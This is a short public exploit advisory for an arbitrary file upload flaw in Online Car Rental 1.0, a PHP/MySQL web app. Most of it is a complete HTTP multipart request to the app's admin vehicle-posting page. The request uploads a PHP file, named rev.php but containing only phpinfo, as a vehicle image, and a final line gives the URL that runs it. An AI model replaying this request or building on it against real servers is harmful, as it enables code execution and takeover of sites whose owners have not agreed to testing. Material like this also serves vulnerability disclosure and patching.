# Exploit Title: Online Car Rental 1.0 | Arbitrary file upload
# Exploit Author: Richard Jones
# Date: 2021/09/02
# Vendor Homepage: https://www.sourcecodester.com/cc/14145/online-car-rental-system-using-phpmysql.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14145&title=Online+Car+Rental+System+Using+PHP%2FMySQL+with+Source+Code
# Version: 1.0
# Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34



POST /Online%20Car%20Rental/admin/post-avehical.php HTTP/1.1
Host: TARGETURL
Content-Type: multipart/form-data; boundary=---------------------------41518493223397502791049196241
Content-Length: 1819
Cookie: PHPSESSID=8ouf7h44qe55bk4eqai1p145o1
Upgrade-Insecure-Requests: 1

-----------------------------41518493223397502791049196241
Content-Disposition: form-data; name="vehicletitle"

a
-----------------------------41518493223397502791049196241
Content-Disposition: form-data; name="brandname"

2
-----------------------------41518493223397502791049196241
Content-Disposition: form-data; name="vehicalorcview"

a
-----------------------------41518493223397502791049196241
Content-Disposition: form-data; name="priceperday"

1
-----------------------------41518493223397502791049196241
Content-Disposition: form-data; name="fueltype"

Petrol
-----------------------------41518493223397502791049196241
Content-Disposition: form-data; name="modelyear"

1
-----------------------------41518493223397502791049196241
Content-Disposition: form-data; name="seatingcapacity"

1
-----------------------------41518493223397502791049196241
Content-Disposition: form-data; name="img1"; filename="rev.php"
Content-Type: application/octet-stream

<?php phpinfo(); ?>
-----------------------------41518493223397502791049196241
Content-Disposition: form-data; name="img2"; filename="Untitled.png"
Content-Type: image/png

-----------------------------41518493223397502791049196241
Content-Disposition: form-data; name="img3"; filename="Untitled.png"
Content-Type: image/png

-----------------------------41518493223397502791049196241
Content-Disposition: form-data; name="img4"; filename="Untitled.png"
Content-Type: image/png

-----------------------------41518493223397502791049196241
Content-Disposition: form-data; name="img5"; filename=""
Content-Type: application/octet-stream


-----------------------------41518493223397502791049196241
Content-Disposition: form-data; name="submit"


-----------------------------41518493223397502791049196241--


# Call malicious file at: http://TARGETURL/Online%20Car%20Rental/admin/img/vehicleimages/rev.php